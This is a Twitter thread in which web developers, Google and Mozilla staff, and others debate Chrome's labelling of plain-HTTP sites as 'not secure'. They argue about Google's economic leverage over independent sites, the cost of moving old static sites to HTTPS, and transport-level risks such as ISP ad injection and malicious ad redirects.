See the entire conversation

I don’t agree with all the points ⁦@davewiner⁩ makes here, but his underlying premise is key: we should be very wary of the coercive power Google has over the web. Labeling an old static site that collects no data “insecure” is simply inaccurate.
Google and HTTP
I've been writing about Google's efforts to deprecate HTTP, the protocol of the web. This is a summary of all the reasons why I am opposed to them doing this.
277 replies and sub-replies as of Jun 15 2018

I’m all for HTTPS — every site or app on @glitch supports it automatically — but we’ve seen Google coerce sites into changes before, even on something as small as an underscore, and it’s bad for the web.
Underscores, Optimization & Arms Races – Humane Tech – Medium
A history of how we started designing apps & content to appease algorithms instead of ourselves, and the arms race that ensued.
(For the record, I’m 100% in favor of HTTPS and strongly encourage sites to move to it. I also don’t think Google should be in a position of unilaterally foisting costs on independent sites.)
Something that I keep wondering about is "what is the environmental cost of HTTPS everywhere?"
'Costs'? What costs. LetsEncrypt us free. For lower volume sites Cloudflare free is a few minutes to set up and get running.
These things don’t actually work for everyone, and getting the knowledge to set them up requires thousands of dollars of education & free time. I wasn’t able to do it on the server that hosted my site & ended up just moving my blog to Glitch.
Fair enough my opinion is skewed by long web experience. But putting your users at risk because you lack the skills to keep them secure is also less than ideal!
Sure, but that’s what the web is *about*. Being able to participate even if you lack experience. And it’s especially important to preserve sites from before the dominance of Google & Facebook.
The notion of free TLS is so new that it may still seem like "requiring" HTTPS is a barrier too high for many to surmount. But I believe we have the tools now (LE, Caddy, etc.), and once they become established, enabling HTTPS will be automatic, with no experience required.
Completely agree. This move is costing us around $150k to implement. For a small business with 7-ish people, it’s a big deal.
Hi Ben. Not doubting your figure at all, but would you be willing to break that cost down? I would love to know more about the costs that other companies are facing to encrypt.
I agree with the general point re: coercion by Google (or whomever) but this “HTTP is insecure” movement specifically has broader support than just Google, right? Mozilla is arguably the most ethical of the browser makers, and they’re doing the same thing:
Communicating the Dangers of Non-Secure HTTP
HTTPS, the secure variant of the HTTP protocol, has long been a staple of the modern Web. It creates secure connections by providing authentication and ...
I think their change, focused on passwords, is a perfect balance. And Mozilla’s responsibility is very different since they don’t have a search monopoly and monetization dominance.
At the end they mention plans to indicate every HTTP page is insecure (although could have changed since published a year and a half ago). But regardless of motivation, isn’t the end result the same? Unless Google plans on using it as a negative signal in search or something?
They do plan to use it as a negative search signal.
Oh. WELP ¯\_(ツ)_/¯ I agree with regard to that, then. A browser is supposed to be my “user agent”; a search engine is supposed to show me relevant things.
Interesting... I always wondered what happened to Anil Underscore...
Every new requirement or even “best practice” adds a barrier to just making a web page without using some increasingly entrenched middleware. I don’t think a static blog that doesn’t use JavaScript or cross domain resources should be held to the same standards as an email client.
Quite true. And there are decent alternatives. Maybe the UI should show "Insecure forms" if, say, the site uses forms and doesn't have SSL. Explicit, and clearer than the status-quo. If no information travels up, there's no reason to call the site insecure.
I'm not sure I agree. Data is flowing two ways; without HTTPS, who's to say that the old static site you want to visit is the actual page you end up going to?
If we’re gonna go there, how do we know the server hasn’t been rooted?
We don't, but if we had an easy-to-use, widely deployed technology that could defend against that possiblity, it would also be worth implementing even on static sites that don't collect data.
Like you and Dave, I'm wary of Google pushing its weight around, but I don't think making that argument requires denigrating the usefulness of HTTPS, nor the desirability of ubiquitous encryption
Never mind that HTTP/2, Brotli and more 'new web' techs require it. Insecure is rapidly becoming the second-class internet.
If I denigrated the usefulness of HTTPS, let me know where, and I'll edit the piece. That certainly is not my belief or intention.
Chances of that are far smaller than MITM at some point you have to trust the server. Some random coffee shop using a provider which inserts cryptomining / malicious code is far more likely (and happens widely).
What % of servers are running an insecure version of their content management system?
It's far from either / or. That just smacks of whataboutism. The point is that it doesn't matter if you're running v.latest of some CMS with a super locked down server; if you don't use mechanisms like HTTPS & HSTS / pinning you're potentially exposing your users to risk.
Every site we visit is potentially putting us at risk. Using one factor to decide to display secure/insecure is a poor threat model.
I agree but back to your original point; ALL sites should have HTTPS enabled by default and redirect to a secure version when necessary. Cost is no longer an excuse...
You gonna pay to move my old sites?
So if your site is found to be hosting malware tomorrow you blame people not helping you to move to a more secure app? If you deliver content to users *you have a responsibility* to keep them safe.
There’s no malware today, there was none yesterday. That’s the point — on a static site, nothing has changed except one of the richest companies in the world giving a site owner a unilateral deadline to make a costly change which users don’t (yet) care about. What’s next?
Anyway thanks for the debate. Have a great day!
Very well put! ;-)
There is a benefit to not allowing ISPs and govt agencies seeing what you are reading, and a great benefit to having as much traffic as possible be encrypted, but for static sites without web forms the upside is minimal at best.
It's worth keeping in mind that HTTPS isn't about the site, it's about the connection between user agents and the site. If your site runs your visitors' computers hot because someone injected a coin miner, the visitors won't care if the script came from your server or not.
Your ISP or hotspot can inject javascript in non-HTTPS pages and it's completely non-transparent. That in itself justifies retiring HTTP.…
There’s no malware today, there was none yesterday. That’s the point — on a static site, nothing has changed except one of the richest companies in the world giving a site owner a unilateral deadline to make a costly change which users don’t (yet) care about. What’s next?
Google and Mozilla have taken over two years to let users know this labeling change for HTTPS was coming in their browsers. How many years did you expect them to wait to nudge users away from an insecure protocol?
HTTPS does not provide any proof of authenticity or identity. Zero. It simply encrypts traffic on the wire. Anyone can get a free LetsEncrypt cert and attach to a stolen domain.
Bad id (too old): 187572289724887041
Indeed, HTTPS-everywhere won't square Zooko's Triangle. Corporate oligarchies dictating those trade offs will have predictable results.
US and CN governments like to MITM plaintext sites to pwn the browser
I agree with all of those arguments. None of them refutes this key point about Google’s coercion, or explains who’ll pay the countless millions of dollars to retrofit older sites.
I wasn't looking to refute a thing, just sharing the link :)
HTTPS is about guaranteeing the content you see comes from the correct server
I know what HTTPS is, and do think every site should adopt ot. Do you know the history of Google forcing costs on independent sites?
Yes, I do. Every browser vendor imposes costs on developers in one way or the other. :(
I agree on the Google point, but I don’t see how opposing HTTP deprecation meaningfully addresses that problem. This feels like the webmaster equivalent of Rolling Coal.
Is that entirely true, though? It _is_ exposing me, to my ISP and anyone else who wants to look along the way.
I think that’s a valid concern. I don’t think Google should threaten an economic cost with a unilateral deadline to force people to fix it.
Your ISP can still see what domains you access -despite- HTTPS...I do think a tracker-free static HTTP site is a far smaller privacy risk than a HTTPS site with any kind of ads or analytics.
If you use their DNS yes but how else?
Which poses the next question: who do you trust with that data instead of your ISP?
Can't plain HTTP traffic be trivially modified while the same is not true for HTTPS?
Absolutely. Moreover, the price argument is so relative when one considers the degree to which many web hosts overcharge and the difficulty someone with an old website or blog will have in adding a new SSL cert.
Hi Christina! Fortunately, Let's Encrypt can do away with all of that cost and difficulty. For instance, all of my domains through my host just got certificates issued to them last month, no cost. All I had to do was ask my host to do it!
Let’s Encrypt is awesome and it’s great your host is using them. My concern is many do not and setting it up yourself, while trivial for many of us, can be complicated when you consider it needs to be renewed every 90 days
Again, I love LE and am so glad it exists. My broader point is that for many sites, especially older static sites, the hosts they are on likely don’t care or won’t implement LE for free.
Same here: LE's a game-changer. I've implemented it a few times myself, and installed certbot alongside to keep the certs renewed. I am hopeful that most HTTP-only sites will be upgraded. For the rest, they will still be served to visitors, just with a small warning in the UI.
I have moved sites to HTTPS with @letsencrypt. Before people say this is too hard they should try it on a site themselves. I was surprised at how easy it was.
If the publisher of an old site is paying for hosting, that host is going to support free HTTPS certificates from @letsencrypt if it doesn't already. The Google/Mozilla push to HTTPS has made doing this easy and free in most circumstances.
It’s the browser’s job to keep the user safe. I don’t see how a change in google ranking is unfair now that certs are free.
A browser is a User-Agent. Its responsibility is to the USER not the server. If a site is non-https the session can be monitored and modified by ISP, work vpn, or a hacked Wi-Fi that doesn’t care if you’re serving recipes, it’s inserting a bi*coin and FB password miner.
Installing & configuring certs isn’t free. And free certs don’t work for everything.
Agreed but neither is hosting a website. In what situations does letsencrypt not work? There’s github pages but I do wish there were more good, free (of cost and ads) website hosting solutions. Mostly I wish self-hosting from a broadband-connected home was easy for all.
Well, I am the CEO of a company providing good, free, ad-free, no-tracking, HTTPS dynamic or static websites, so I think I'm pretty solid in being in favor of that, too. But the broader issue is Google's coercive power. We need to not just accede to them, in general.
Curious: what don't free certs work for?
Apparently if you want submit an podcast RSS feed to iTunes you can't use a Let's Encrypt cert.
Idk but are you sure that’s a current limitation? Looks like that was a problem in 2016 before Apple updated their root CAs. If anyone is rejecting letsencrypt certs now that is a problem.
Apple Silently Adds Support for Let's Encrypt Certificates on Podcast Feeds - FeedPress
FeedPress has tested compatibility and is happy to confirm that you can now submit podcast feeds to iTunes using Let's Encrypt SSL certificates.
It's not free the first time, but after that the script handles it unless you're purposefully making it hard.
Keeping code running is harder than keeping static files up. Letsencrypt makes this fairly simple, but it still needs you to update your site or your dns in response to a challenge, so you have code that can post to your site.
If your site is really that unimportant, then nobody will notice that Chrome says it's not secure.
That's quite the non sequitur. You're handwaving away the admin tax. but even big 'important' sites die
I maintain nearly a thousand non-free SSL certs for a Fortune 500. I'm intimately familiar with how much work it is. If your site is important enough that anybody will notice Chrome says it's not secure, you can afford to manage a free cert.
Some hosts @HeartInternet for instance with millions of http sites, charge for certs and don’t enable for the use of letsencrypt on shared boxes. So even discounting the time factor, https isn’t free universally
given it can be intercepted by any man in the middle to do any harm they want, it's insecure. or how can you prove that your site gets the way you made it to your client? with http, you just can't.
I understand how HTTPS works.
so you know why it's insecure to not have it 🤷
Do you think it's insecure for people to have to change things as minor as punctuation marks on their websites in order to appease Google? I think that's also a vulnerability of the web.
you're whatabouting now. anyone can inject some hidden js into your page to spy on that user in many ways, or mine coins, or whatever, if its http. Thats the very point of flagging it as insecure.
(and about your whatabouting point: I dont use any google products myself for a reason 😉 but that doesnt change that http is exploitable for any mim)
It's one point. Another point is Google cementing their ability to make every site on the web pay to change their infrastructure, or face economic penalties from Google. You keep ignoring that point. It's not whatabout, it's the fundamental.
http is not in any way secure. THAT is fundamental. Https is free nowadays, so it's absolutely no issue for anyone.
It's absolutely no issue? How come you haven't upgraded every HTTP site then?
i did all mine. And yes, it's no effing issue. Its not some evil plan of google to make certificate money or anything 🤷🤦 letsencrypt and cloudflare both provide free options for certificates for any page.
I'm asking why you haven't upgraded every HTTP site. You said it's nothing. So upgrade every site. Can I tell everyone you'll do them all for free?
because i don't own them? Thus i can't access them to fix? How fucking stupid, seriously?
i guess you never install any updates on any systems, too, cause that is eeevil.
Ah, I see, you’re not ready to talk with the grownups.
sais the guy who thinks https costs money to install and is somehow an evil plot by google.
If it costs nothing, why haven’t you updated every HTTP site? Can I tell everyone you’ll upgrade them for free?
because i do mine, you yours etc. Same for patching etc. How the fuck is that hard to grasp? And yes, i payed 0$ to do mine, as does everybody else.
just because the certificate can be gotten for free doesn’t make the whole process of switching sites and services over to using it free. some things might require new planning, custom in-house code might need refactoring, you’ll wanna check what ciphers and protocols you enable
He obviously knows that and is incapable of acting like an adult about it. Although I suppose it’s more charitable to think perhaps he’s just incompetent?
no. But its a website owners duty to patch and update and secure their systems. you can chose not to, but then get flagged as insecure. If you don't value making sure your visitors are safe accessing your content, you deserve that.
*checks list of .gov sites that don’t support HTTPS* i want a refund on my tax money that went into those sites. who do i send notice to, dave?
contact the owners of the site, obv. Your government then.
many folks with a website probably have no place operating it themselves, granted. but lots of smaller companies still need that website to either relay non-interactive content or simply to get discovered online (particularly by searches). simple for you/me != simple for everyone
for whoever made the site, it IS simple. if its some hoster, contact them. If its own made, ask the guy who set it up. Etc. Create cloudflare account. Point dns to it. Point cloudflare to site ip. Done.
these are all things which require technical knowledge and time spent. some of the static sites still using HTTP are run by people with neither the time, the know-how, or budget to get help. there are more websites than people and not every webmaster is on the same level
so having them exploitable in the open has to be ok cause they dgaf? Seriously guys you're fucking bonkers.
its like a 5min task for any static website with cloudflare if you want the easy route. If you can't be bothered for that, don't do websites. It's your responsibility to your clients.
You nicer than me💞
Feels like preserving old sites and putting up new sites are two fundamentally separate concerns
Old sites that are no longer being updated, that is
Yes. And very different from a resource point of view. If I've created 1000 sites since 1994, the cost of converting them is huge, esp consider that most are already somewhat broken. It means opening environments that might not run any more, given the OS vendors deprecations.
That is to say, it is easier to make the case that HTTP is insecure than it is to make the case that HTTPS is secure, because what is "secure?"
I think the criticisms of the other folks (particularly the SEO & firewall nonsense) is fine. I understand this isn't a Google-only initiative, but other players don't have coercive economic power over independent sites, which is the underpinning of the concern here.
(reiterating: ) — every @glitch site or app is HTTPS, and has been from the day we launched, for free.
(For the record, I’m 100% in favor of HTTPS and strongly encourage sites to move to it. I also don’t think Google should be in a position of unilaterally foisting costs on independent sites.)
^ This is how you HTTPS.
I am always skeptical of Google, but when they are right on a point, I will acknowledge that. I do not see how this UI change asserts any power over... anyone. Google is not forcing anyone to buy a certificate, especially from them. HTTP will continue to work. Am I wrong?
HTTP content will be ranked below HTTPS content, even if the HTTP content has not changed in accuracy or relevance. This is foisting an economic cost on people who've created content, and conflating Google's search/advertising dominance with browser/protocol security.
I would consider this separate from the upcoming UI change, but it is a very good point, one that I cannot immediately counter.
I think it's the key (and admittedly a tough one to articulate) and we need to find a way for the community to discuss it, because sometimes it *won't* be in service of things like HTTPS that we all agree are worthwhile.
Google aren't even a CA so it wouldn't make any sense if they were. HTTP is going away, it will still work just with a 'not secure' warning. Flipping the indicator makes sense, more people see 'Secure' most of the time now, it's eroded any value it once had.
As HTTP quickly becomes the minority and secure becomes the default, I'd agree that it makes total sense for the default state to not attract any warnings/indicators to avoid fatigue.
They don't and that's why if it was Google acting alone we should all be concerned. The reality is though that countless, independent organisations and people the world over agree that a secure web is better for everyone. That's why we're moving towards achieving that goal.
Google is acting alone on connecting this initiative to its economic power through search & advertising. If they want to use their economic power to encourage HTTPS, they should write checks to publishers to move them over.
As we all acknowledge, this is not a Google-only change, but they are catching all of the flack. So what are they to do? Sit on their UI change while every other browser makers implement theirs?
If they made the UI change and didn't tie it to their search & advertising dominance, I think the conversation would be very different for me.
Correct me if I'm wrong, but didn't Google start preferring HTTPS sites in their search results four years ago? I don't see how they're tying this UI change to their established search engine bias. I suppose if that was their plan, an industry-wide shift would provide cover...
I don't make an issue of the search engine. It's theirs, they created it. I may not like that they have devalued my (in some cases authoritative) writing on topics because it doesn't come via HTTPS, but I admit they have the right to do that.
They do, but I’m thinking more of sites that also run Google ads. Tying economic & security concerns muddies both.
Perhaps, but that shouldn't preclude a good change from being implemented, especially when not doing so would make them look less security-minded than their competition.
By the way, I apologize if my responses look disconnected from the conversation. I'm seeing fewer comments than the counter indicates, so Dave (who blocked me a while back) must be commenting as well.
No worries, I’m following along.
Not that I think it's wise. There's a name for it, "strategy tax." Microsoft used to do that. And imho it didn't work out well for them. They should be trying to make the best search engine. It shouldn't be more complicated than that.…
Google is rather bigger than just search. I suspect the advertising side is bigger than search. More to the point, standards change and evolve. Some lead and drive change, while others maintain legacy for longer. Nothing sits still.
There is nothing to stop you using RS-232 or floppies now, it just takes a bit more effort because manufacturers don’t support them out the box.
"I don't make an issue of the search engine. It's theirs, they created it." You make an issue of their browser. It's theirs, they created it. 🤔
My biggest problem with all this are the people making out that Lets Encrypt have made using https easy / free. They don't support the default OS on the most popular hosting provider (Amazon Linux) - baffling that people consider that OK while promoting them?
Luckily Amazon offer their own alternative via ACM that's easy to use, but it shouldn't be made out that LE have made https easy for *everyone*, because it's not the case.
I'm not sure anyone claims they've made it easy for *everyone*, that would be silly.
It's implied a lot though, we are told there's no excuse for not being on HTTPS now because of them - which isn't the case. I agree with the moves google are making but it's not right to claim that LE are the sole enablers for everyone, which I've seen a lot.
Installing a cert via LE is pretty easy though. If you're already running your own server I reckon you could handle it. If you're on managed hosting then you probably have an option for HTTPS from your provider.
I've done both, and I agree that when it's an option, LE is fantastic. I think Chris's point is that there are "else" cases after your "ifs", where LE is not an option. In many cases, there are alternatives to LE, but in other cases, nothing fits the role.
It is on anything but Amazon Linux. I managed it once, after a lot of faff, but at renewal it totally broke. Can't be relied upon, and they don't officially support the OS. I use ACM now and it works fine though.
Serious question: Why use Amazon Linux over Ubuntu? I've always used an Ubuntu AMI for EC2 setup and it's generally plain sailing. What does Amazon Linux offer to make it worth using?
I've always preferred Redhat/CentOS based OS's to Debian/Ubuntu anyway, am more used to it, and Amazon yum repos are kept much more up to date than CentOS ones, so it's best of both worlds too.
Looking at pricing for Ireland, Amazon Linux is less than half the cost of RHEL on the same instance type. Significant savings.
I'm not running RHEL though, I'm running Ubuntu. Pretty sure it's the same cost as Amazon Linux.
The other reasons apply then. Always saw Ubuntu as more of a desktop OS. I'm surely they used to be differently priced too!
That's fair to say. I suppose that this early in the paradigm shift where HTTPS is the default, statements like "LE is free and easy!" should be preceded with caveats. In many cases, yes, LE (and similar services!) make HTTPS free (of some specific costs) and (relatively) easy.
The open web with conforming user agents is different than a proprietary commercial search engine.
Sadly, labeling them as insecure is too often accurate. But - the people claiming Dave has no point and HTTPS is free and w/o downsides are wrong and obnoxious. A proper plan to improve the security of the web would recognize and address his concerns, not brush them off & mock.
An old HTTP site is insecure because it can be modified in transit with no indication to users that it occurred. This is happening all over the world. Verizon injects a X-UIDH header as a user-tracking "supercookie" in all customer HTTP traffic, for instance.
Stop beating around the bush and strike directly at Capitalism.
Yeah, and also securing IP in general would be a better project for Google to push. Securing each protocol independently is (a) much more work, (b) a larger attack surface, (c) leaves unpopular protocols behind, etc.
I believe the connection, not the site, is what’s labeled insecure. Not that most users appreciate that difference and it doesn’t diminish Dave’s valid concerns.
Trying to find where I stand on this. Moving all sites to TLS is a mutually agreeable goal. The cost of that move, while cheap now thanks to LE, is still >$0. Is the only issue here that Google is the one coercing the spend? If it were some independent body, would that be fine?
'HTTP is great because anyone and everyone can ship it' - is this actually great? Aren't we being forced to reckon with the legacy of imperfect web techs that have given us IOT botnets and easy-to-fuck-up apps that leak data or can be used to pivot against others?
I think the web's "social agreement not to break things" is beautiful, but did it ever really work? Yes if you look at adoption as a metric but once you include security, every unpatched CMS is a transgression against that agreement.
Agreed! I used to have a lot of success selling against insecure CMSes. :)
Well, it’s complicated. There was a similar argument to this about SMTP; some people chose to run principled open relays based on the belief that tools like SPF hurt anonymity, etc. Some still believe human-readability of protocols is a value worth preserving.
I think it’d be closer to fine. Certainly would be cleaner and less fraught.
Agreed. But I differ on immediate concern. It's good to be wary of Google's influence. But also the pace of change in these tech stacks has been so slow. I think I want that needle shifted closer to security, though that comes at some expense to compatibility.
So I'm happy Google is doing something, because there's currently no alternative authority that can force the change. Which, admittedly, is a bit of a cop out if your concern is ensuring checks and balances on Google...
Yep, and I think Google uses the broadly-loved initiatives like HTTPS as the thin end of the wedge for less clear-cut goals.
It's by design that they don't change. That's the great thing about the web and why it's a good place to archive stuff for future historians. If Google wants to make something better, they are free to. But they should not interfere with the web.
The history concern is an interesting one, but it can be mitigated in part by archiving projects. I'm not convinced that what remains is a good enough reason to delay a positive step for security on the web.
And I really strongly disagree with your central simplicity point. I don't believe there's a big shortage of TLS capable hosts, and if you tinkered enough to put your own box online then you can tinker a bit more and have it speak TLS.
Not to do so is irresponsible, in the same way that standing up a box with no patches and root:root SSH creds is irresponsible (though granted to a lesser degree).
The fallacy here, is that the old static site that collects no data, will continue to be a static site that collects no data, now its content is entirely under the control of a third party the original author didn't opt into.
Sure, and the fallacy is also that an HTTPS site running ads from a network like Google’s, known to redirect users to hostile sites, isn’t marked as insecure. Both matter. The latter affects more real users.
I don't know if you have data for that claim, but I've frequently seen http sites infected by WiFi hotspots. I'm also unaware of these hostile redirects, but they're surely bugs, right?
Additionally, Dave is a trash source. He posted that Chrome on Mac had official been abandoned, citing an unnamed internal source. Then he proceeded to delete comments from Chrome folks refuting that. He has a massive agenda here for some reason.
For completeness: Here's the post where Dave said Chrome had officially been abandoned. He's since removed that from the post (much later), but some of the comments still hint towards the original content.…
And he throws his toys out of the pram about me here…, because I dared to call him out on deliberate misinformation.
I've been flamed by Dave many times, some of them clearly in the wrong. I'm not vouching for all he says, I'm using his points to illustrate a larger issue.
Then find a better source. It's like giving the thumbs up to Fox News at this point.
Okay I’ll try to write something up.
FWIW Anil, I recommend you not write this up, at least as you've expressed it on Twitter, because it's not accurate. Google isn't unilaterally doing anything. Mozilla, the USG, and many other orgs are making the same push.
The only point I'll give to Dave is that site owners are being asked to take on some complexity, but when it comes down to it, Mozilla and Google both ultimately put user needs above site owner needs -- and that's what we should want.
It's also important to understand that labeling an old static site as "insecure" is completely accurate, if it's served insecurely. I won't go on a long tweet thread with the reasons unless you want me to, but content integrity and herd immunity are crucial to a healthy web.
I think that's a strong argument. I think it's important to understand the implications of Google's ability to unilaterally exact costs from creators, too.
None of them are using the coercive economic power of monopoly advertising, search or search targeting systems. Which is central to my point.
Google's ability to abuse its vast power across many verticals is real. But I don't think HTTPS is a good example of this, since they're part of a coalition with so many differing incentives and conflicts and levers. It's better seen as a team effort with an obvious large player.
I can see that.
I second Eric here, but if you write something, I'd like to read it. Nice chatting with you yesterday, by the way.
absolutely agree with Eric here. Eric may be too humble to point to as the more direct, systematic response. There are many of us doing whatever we can to get everyone on HTTPS, by default, using modern crypto.
The HTTPS-Only Standard - Why HTTPS for Everything?
Resources, best practices, and case studies for deploying HTTPS in the federal government.
Co-signed (with my Mozilla hat on) that this is a multilateral effort and is the foundation for safety and security of people using the web, including static sites. We don’t know each other, Anil— but happy to have a chat about this anytime!
To be clear — I fully support the HTTPS push, and get it, and that's why (e.g.) Glitch has always done HTTPS for everything from the start. The broader conversation was more about how Google uses its economic power; this was probably not an ideal example to hang that on. :)
To be fair, he does have a slight point with the advertising redirecting us to insecure places, I've seen that a lot. The Google marking insecure websites thing is wrong though, users can make their own decisions based on that, also it isn't only Google doing it.
Sure, but if a site was redirectable to another origin by a third party, we'd have to mark loads of the web as "not secure" (eg ). That would lead to warning fatigue – exactly why we held off on making HTTPS the default.… - Redirects, except in Chrome where we block it. These kinds of iframes are on the homepage.!/redire… - Click "Show", the original page is redirected. So yeah, by these rules we'd have to mark Glitch as "not secure"
Combining automated deployment, instant hosting & collaborative editing, Glitch gets you straight to coding so you can build full-stack web apps, fast
I agree with what you're saying, it's a never ending subject really. I think we should mark http websites as insecure, as long as we just do that and let the user decide if they want to continue. In terms of cross site, that's another question that also needs to be looked at.
I think cors works for a lot of things but it isn't perfect in my opinion. I don't really know what the solution is to these, it probably isn't a not secure message though tbh, it will take smarter things than that.
Yeah I'd agree, cors isn't what it could be as there's no real client side validation. SRI works great for development, the average WordPress user doesn't understand it though. Something as secure and as simple as https is definitely needed for cross origin IMO.
CORS is for "should origin A be able to read the content of origin B", it isn't supposed to make claims about the content. SRI makes claims about the content. HTTPS makes claims about the sender and the transport.
Sure, I get that, just saying it would be great to have cors and Sri and https in one easy to understand package for the average user.
Google has a lot of power over the web, but http is legit insecure, regardless of what it wants from you, you've viewed insecure content, it may of been tampered with in many trivially easy ways especially on "public WiFi". It's quite accurate IMO
All browsers do this; Chrome just makes it more explicit by using words in addition to icons.
We also have no intention to make people click through warnings to get to HTTP websites. Most of that blog post is a conspiracy theory. We have made our plans known for years before making the corresponding UI changes, and full page warnings are not on the roadmap.
that post makes it sound like google will be breaking the web whether you have an iPhone X or a rotary phone you can still make calls and the same can be said about http v https
aren't rotary phones incapable of working with modern telephony networks
Dave Winer has conspiracy theories? Wow, color me shocked!!
Something something Gwyneth Paltrow
Once, in a particularly deep Chrome debugging session, I stumbled across the code that killed JFK. Aaaa!... they're coming for me!
This isn’t just about the browser, though (for me). There’s a broader point about how Google uses its economic influence over independent sites to force then into costs they can’t predict, while not holding itself similarly accountable.
There are plenty of things Google does that merit criticism, in particular on web privacy (Chrome could do a lot more), but on this I feel Google is using its power for good and responsibly. This is the kind of thing we often ask big companies to do: use your power for good.
Plus, this is entirely a user agent change. You could pick a different browser... Although others have concluded that this path makes sense, too, and I don't think it was under duress.
I agree with the goal of this one, but not the tactic. Does that make sense?
Which parts of the tactic? I think Dave Winer is overstating the tactic significantly.
2 qs: Would you put this in the same category as a certain fruit company removing the headphone jack? Can there be a meaningful heuristic to recognize sites that collect data and sites that don’t?
Ignoring the motives of Google, encrypting every part of the web is a necessary step in evolving the platform and ensuring the free exchange of information over the internet. In my opinion.
What if google decided a necessary evolution of the housing market required no two-story homes. It’s safer, no stairs to fall down on and hurt yourself.
Many countries do have building safety regulations for even private residences - i.e. compulsory sprinkler systems, regulated non-flammable materials, etc. Your reductio aint *that* absurdum, really.
Those are government regulations and theoretically the governed have a say and a method of appeal. None of which is true here.
No, but neither do Google regulate house size
A more accurate comparison would be if a gated community imposed those rules on their owners.
I disagree with both you and winer. All HTTP sites are insecure because they may be changed in transit. It may have been a static site when it left the server but it could be anything at all by the time it is received. It could be one big iframe.
However, I see a different critical problem with what Chrome is doing, in line with Winer's complaint. HTTPS is not forward compatible. Downgrade attacks mean we have to depreciate TLS versions periodically.
A TLS web server from today will not be able to talk to a browser from 20 years from now. A browser from today will not be able to talk to a TLS web server 20 years from now. That is an existential threat to the web, or changes it into something else at least
Old static sites that collect no data (themselves) are still insecure. This is just one case where it happened to, but many ISPs around the world regularly inject ads into all HTTP traffic
How a banner ad for H&R Block appeared on—without Apple’s OK
Someone, somewhere is injecting banner ads into webpages on the sly.
No argument. But brand new, HTTPS sites that run Google ads are also susceptible to being redirected to hostile sites. And it seems like that's affected the same number of users. So, what are the criteria for consideration?
The premise of HTTPS is that the origin is in control of security. The legacy “secure” was definitely wrong. The new states are “definitely insecure” and “undefined” which makes sense to me.
C'mon, it's the same answer I gave you earlier. That was a bug as part of Google's service. Glitch currently has similar bugs. As do many sites. The reason we held off on marking HTTP as "not secure" is to avoid error fatigue.
And again, this is moving the goalposts. You're saying "plain HTTP is not secure" is "inaccurate", how are you justifying that?
Maybe better stated as “how Google defines ‘secure’ isn’t knowable or accountable”.
And re: redirecting ads, this isn’t people creating harmful content, which can happen on any open platform. It’s harmful content being injected into other sites, which causes Google to flag sites as insecure when others do it. This goes back to the lack of definition.
I think the conflation of the value critiques with the absurd ones, and the fact multiple googlers have alluded to conspiracy theories here, is a bad look.
I think your critique is completely fine. You just conflated it with a conspiracy theory which is a bad look. Just disentangle it and you're fine.
Agreed. There might be good point here that's being lost amongst the whataboutery and "Dave Winer said…". From my end it looks like "Google ads delivered some bad content in the past, therefore all browsers should mark plain HTTP as secure"
Okay, try this: Google has coerced independent sites to keep chasing poorly-defined requirements for more than a decade, at times conflating legitimate concerns like security with conveniences like appeasing its ranking, while leveraging monopolistic economic power over them.
Given that power imbalance, a clearly-stated rubric stating when Google will exert economic influence over sites is necessary, and until it is, mandates of conformance with new requirements should be accompanied by funding from Google'a ad & search platforms to accomplish them.
This doesn't preclude the browser or other user agents being able to make whatever choices it wants; those decisions just shouldn't be tied to search, advertising, targeting, or other markets where Google has a monopoly presence.
And the way this connects to "insecure" is that Google's user agents have never identified Google's advertising products as insecure even when they are demonstrably so. Which raises the question of how Google's economic and security interests interact.
Citation needed that this has never happened. Hosting e.g. ads independent of source that contain malware would lead to flagging on the safe browsing list.
I'm still stuck on the idea that something which once served a buggy thing, must be marked as "not secure" forever more. Are you proposing this for just Google ads, or everything including Glitch?
You’re conflating content people create with content injected into other sites. The question here is how the definition of “insecure” intersects with authority over content. If Glitch inserted insecure content into sites, sure. But users have authority over their Glitch sites.
And you seem to be conflating intentionally serving content over an insecure underlying protocol (which all security folks agree is awful for multiple reasons) with bugs/attacks on content which were fixed
Are you saying it's not currently possible to buy an ad on Google's current infrastructure which can redirect users to an insecure site?
I'm pretty confident it'd be blocked in Chrome due to the user interaction requirement, but I'd still be very disappointed if an ad could get that far.
Id so, that's a big change from a few months ago, and not one that's been communicated widely. Publishers I talk to still fear their mobile users getting redirected to spam sites.
Then that's something for Google ads to address. Personally, with my web hat on (it's my favourite hat), I'm happy that an infraction like that gave them a good kicking trust-wise. They deserved it.
I think that’s a lot of this — inside Google, you all (understandably!) see all these things as very separate. Outside? It’s one company, and these things are connected.
True, but on the plus side I feel free spending company time on something that improves users' privacy and security, even if it makes things "harder" for another Google team.
I'd appreciate background about impact to Anil's firm, ballpark hosting costs+examples of active sites that can't move to HTTPS. Archive static sites can stay as zipped DL. I have no affiliation with Google. Agree with @konklone and @benadida on this one.
My point here wasn’t to make you defensive. It was to talk about the conflation of security concerns with economic interests. But your example illustrates my point — yes, Google could unilaterally destroy our business using security as a pretense, which is the issue.
I don't think we've established that this is an unreasonable financial cost.
Isn't this use case addressed by CSP's `navigate-to` directive? Seems to be mentioned up high in the use-cases /cc @mikewest
That doesn't *really* help here if you have to e.g. whitelist your ad provider's open redirect. allow-top-navigation-by-user-activation is what helps here. Browsers *should* make that the default if they e.g. detect something might be an ad IMO (might be the case already).
`navigate-to` can help folks ensure that when you click on an ad, you land on the landing page they think you ought to land on. It's addressing a different problem than forced navigation in general.
Are redirects restricted?
I don't think the intervention distinguishes between redirected and direct navigations. I believe it just prevents the initiation of navigation in the first place.
echoes of the samesite strict vs lax argument. Restricting redirects is safer but may be too strict for some uses.
I personally think that the “nothing must break” approach is hurting the web. Developers will have to fix some things.
I'm willing to implement samesite=lax in my browser if it gets me samesite=strict in other browsers.
Only in conjunction with embedded enforcement, which I think folks in ads are experimenting with at the moment.
DoubleClick for Publishers is, for better or worse, an arbitrary content hosting system similar to Glitch. People can put bad stuff on it, and, even worse, delegate to arbitrary third parties to put bad stuff on their site. Long term plan to fix it
But what about the ads? – Malte Ubl – Medium
This is the story about how AMP came to build a user-experience-first ecosystem for advertising on the web.
Was the NYT flagged while these ads ran? I’m asking genuinely.
Here's the thing about these intrusive spam ads: When readers encounter them, they can't see your site & can't trust its content. This means YOUR WEBSITE IS DOWN. Your revenue team may be well-intentioned, but your ad provider is taking your site offline. Where's the post-mortem?
Anil Dash on Twitter
“It’s exciting to see every major media outlet covering this same important story on their mobile websites.”
That wouldn't have been the process. The offending script would have been blocked, or the redirected-to page would have. I'd have preferred the former.
